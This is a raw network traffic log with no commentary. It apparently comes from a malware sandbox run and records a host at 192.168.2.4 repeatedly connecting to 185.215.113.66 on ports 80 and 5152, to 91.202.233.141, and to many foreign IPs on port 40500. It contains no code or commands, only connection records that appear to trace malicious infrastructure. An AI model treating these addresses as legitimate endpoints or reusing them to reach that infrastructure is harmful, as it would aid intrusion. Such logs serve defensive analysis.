                                                                                                                  Nov 30, 2024 01:57:28.289518118 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.289570093 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.294470072 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.294527054 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.294693947 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.294744015 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.299561024 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.299612999 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.299693108 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.299740076 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.304660082 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.304717064 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.304847956 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.304900885 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.309755087 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.309801102 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.309837103 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.309876919 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.314855099 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.314905882 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.314953089 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.315016985 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:30.336805105 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:30.456799984 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:30.456876993 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:30.591806889 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:30.711740971 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.089554071 CET4999040500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:31.209783077 CET4050049990195.158.18.194192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.209867954 CET4999040500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:31.211889029 CET4999040500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:31.331842899 CET4050049990195.158.18.194192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.331902027 CET4999040500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:31.437848091 CET4999040500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:31.451880932 CET4050049990195.158.18.194192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.601741076 CET4050049990195.158.18.194192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.928805113 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.929083109 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.929095030 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.929120064 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.929280043 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.929750919 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.929809093 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.929946899 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.929960012 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.930000067 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.930043936 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.930412054 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.930460930 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.930552959 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.930594921 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.930857897 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.930870056 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:31.930901051 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.930916071 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.947675943 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.947731018 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:32.049455881 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:32.049513102 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:32.049556017 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:32.049598932 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:32.053273916 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:32.053328037 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:32.061999083 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:32.062043905 CET8049988185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:32.062043905 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:32.062088966 CET4998880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:32.417948961 CET4050049941102.215.170.62192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:32.418155909 CET4994140500192.168.2.4102.215.170.62
                                                                                                                  Nov 30, 2024 01:57:34.016496897 CET5000080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:34.136563063 CET8050000185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:34.136656046 CET5000080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:34.150016069 CET5000080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:34.269965887 CET8050000185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:35.523416042 CET8050000185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:35.524931908 CET5000080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:36.438390970 CET5000640500192.168.2.4198.163.193.96
                                                                                                                  Nov 30, 2024 01:57:36.558454037 CET4050050006198.163.193.96192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:36.558551073 CET5000640500192.168.2.4198.163.193.96
                                                                                                                  Nov 30, 2024 01:57:36.559894085 CET5000640500192.168.2.4198.163.193.96
                                                                                                                  Nov 30, 2024 01:57:36.625452042 CET5000640500192.168.2.4198.163.193.96
                                                                                                                  Nov 30, 2024 01:57:36.679759979 CET4050050006198.163.193.96192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:36.785706043 CET4050050006198.163.193.96192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:36.873332977 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:36.937809944 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:37.495835066 CET405004995490.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:37.495917082 CET4995440500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:57:38.718607903 CET4994980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:38.718970060 CET5001180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:38.839051962 CET805001191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:38.839137077 CET5001180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:38.844782114 CET804994991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:38.844851017 CET4994980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:38.852484941 CET5001180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:38.972513914 CET805001191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:40.230622053 CET805001191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:40.230681896 CET5001180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:41.641576052 CET5001640500192.168.2.462.114.143.56
                                                                                                                  Nov 30, 2024 01:57:41.761665106 CET405005001662.114.143.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:41.761735916 CET5001640500192.168.2.462.114.143.56
                                                                                                                  Nov 30, 2024 01:57:41.763387918 CET5001640500192.168.2.462.114.143.56
                                                                                                                  Nov 30, 2024 01:57:41.781584978 CET5001640500192.168.2.462.114.143.56
                                                                                                                  Nov 30, 2024 01:57:41.883260012 CET405005001662.114.143.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:41.941715956 CET405005001662.114.143.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:42.421953917 CET5001180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:42.422579050 CET5001780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:42.542257071 CET805001191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:42.542330980 CET5001180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:42.542424917 CET805001791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:42.542493105 CET5001780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:42.558646917 CET5001780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:42.678637981 CET805001791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:42.690185070 CET405004996789.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:42.690289974 CET4996740500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:43.928214073 CET805001791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:43.928288937 CET5001780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:46.118912935 CET5001780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:46.119695902 CET5002480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:46.257394075 CET805001791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:46.257407904 CET805002491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:46.257443905 CET5001780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:46.257500887 CET5002480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:46.275511980 CET5002480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:46.395396948 CET805002491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:46.782367945 CET5002940500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:57:46.902458906 CET4050050029151.232.164.243192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:46.902540922 CET5002940500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:57:46.903819084 CET5002940500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:57:47.023855925 CET4050050029151.232.164.243192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:47.023920059 CET5002940500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:57:47.078562021 CET5002940500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:57:47.143946886 CET4050050029151.232.164.243192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:47.241743088 CET4050050029151.232.164.243192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:47.642354012 CET805002491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:47.642419100 CET5002480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:47.885571957 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:47.933532953 CET405004998089.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:47.933607101 CET4998040500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:48.047219038 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:49.706502914 CET5002480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:49.706830025 CET5003680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:49.826699972 CET805003691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:49.826802969 CET805002491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:49.826898098 CET5003680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:49.826903105 CET5002480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:49.827172995 CET5003680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:49.947057962 CET805003691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:51.151923895 CET805003691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:51.153753996 CET5003680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:52.142708063 CET5004240500192.168.2.4188.124.116.191
                                                                                                                  Nov 30, 2024 01:57:52.262804985 CET4050050042188.124.116.191192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:52.262912989 CET5004240500192.168.2.4188.124.116.191
                                                                                                                  Nov 30, 2024 01:57:52.265161991 CET5004240500192.168.2.4188.124.116.191
                                                                                                                  Nov 30, 2024 01:57:52.339554071 CET5004240500192.168.2.4188.124.116.191
                                                                                                                  Nov 30, 2024 01:57:52.385051012 CET4050050042188.124.116.191192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:52.501701117 CET4050050042188.124.116.191192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:53.174417973 CET5003680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:53.174583912 CET4050049990195.158.18.194192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:53.174652100 CET4999040500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:53.174673080 CET5004780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:53.294600010 CET805004791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:53.294675112 CET5004780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:53.294799089 CET805003691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:53.294853926 CET5003680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:53.295239925 CET5004780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:53.415096045 CET805004791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:54.672323942 CET805004791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:54.672944069 CET5004780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:57.407740116 CET5005440500192.168.2.4187.230.142.108
                                                                                                                  Nov 30, 2024 01:57:57.527822971 CET4050050054187.230.142.108192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:57.530945063 CET5005440500192.168.2.4187.230.142.108
                                                                                                                  Nov 30, 2024 01:57:57.532325029 CET5005440500192.168.2.4187.230.142.108
                                                                                                                  Nov 30, 2024 01:57:57.547375917 CET5005440500192.168.2.4187.230.142.108
                                                                                                                  Nov 30, 2024 01:57:57.652193069 CET4050050054187.230.142.108192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:57.709729910 CET4050050054187.230.142.108192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:57.908988953 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:58.047358036 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:58.053077936 CET5000080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:58.053618908 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:58.173414946 CET8050000185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:58.173573017 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:58.173599958 CET5000080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:58.173712969 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:58.175960064 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:58.296001911 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:58.527506113 CET4050050006198.163.193.96192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:58.527585983 CET5000640500192.168.2.4198.163.193.96
                                                                                                                  Nov 30, 2024 01:57:59.556304932 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.556432962 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.556432962 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.556493998 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.556634903 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.556679964 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.556778908 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.556791067 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.556829929 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.557068110 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.557121038 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.557332993 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.557343960 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.557374001 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.557398081 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.557512045 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.557533026 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.557568073 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.557581902 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.559938908 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.559953928 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.676512957 CET8050055185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:59.676598072 CET5005580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:01.838588953 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:01.958548069 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:01.958663940 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:02.005956888 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:02.125977993 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:02.548085928 CET5006740500192.168.2.42.191.61.218
                                                                                                                  Nov 30, 2024 01:58:02.668072939 CET40500500672.191.61.218192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:02.668155909 CET5006740500192.168.2.42.191.61.218
                                                                                                                  Nov 30, 2024 01:58:02.669425011 CET5006740500192.168.2.42.191.61.218
                                                                                                                  Nov 30, 2024 01:58:02.672305107 CET5006740500192.168.2.42.191.61.218
                                                                                                                  Nov 30, 2024 01:58:02.789350986 CET40500500672.191.61.218192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:02.833775997 CET40500500672.191.61.218192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.392518997 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.392532110 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.392591000 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.392760038 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.392811060 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.392908096 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.392918110 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.392951012 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.392967939 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.393352985 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.393414974 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.393445969 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.393460989 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.393486023 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.393507957 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.393903971 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.393953085 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.394025087 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.394129038 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.394577980 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.394610882 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.512530088 CET8050066185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.512949944 CET5006680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.730870008 CET405005001662.114.143.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:03.731039047 CET5001640500192.168.2.462.114.143.56
                                                                                                                  Nov 30, 2024 01:58:05.523519039 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:05.643522024 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:05.643600941 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:05.643829107 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:05.763708115 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.983741045 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.983843088 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.983875036 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.983889103 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.983927965 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.983951092 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.984405041 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.984416962 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.984427929 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.984456062 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.984468937 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.985043049 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.985063076 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.985080957 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.985091925 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.985095978 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:06.985115051 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.985136986 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.985230923 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.985255003 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:07.104012012 CET8050075185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:07.104262114 CET5007580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:07.688832998 CET5007640500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:07.808998108 CET405005007694.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:07.809663057 CET5007640500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:07.810941935 CET5007640500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:07.812922001 CET5007640500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:07.828821898 CET5004780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:07.901616096 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:07.930816889 CET405005007694.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:07.949348927 CET805004791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:07.950870037 CET5004780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:07.953641891 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:07.973907948 CET405005007694.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:08.848529100 CET4050050029151.232.164.243192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:08.848745108 CET5002940500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:58:09.019366026 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:09.139513016 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:09.139717102 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:09.139801025 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:09.259762049 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.587563038 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.587646008 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.587647915 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.587658882 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.587690115 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.587722063 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.588202953 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.588227034 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.588246107 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.588247061 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.588263988 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.588289022 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.588361025 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.588393927 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.589241982 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.589255095 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.589266062 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.589298010 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.589340925 CET5007780192.168.2.4185.215.113.66
